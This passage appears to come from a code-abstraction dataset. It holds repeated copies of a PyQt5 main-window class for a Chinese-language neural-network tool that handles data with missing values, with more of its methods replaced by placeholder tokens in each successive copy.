modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply 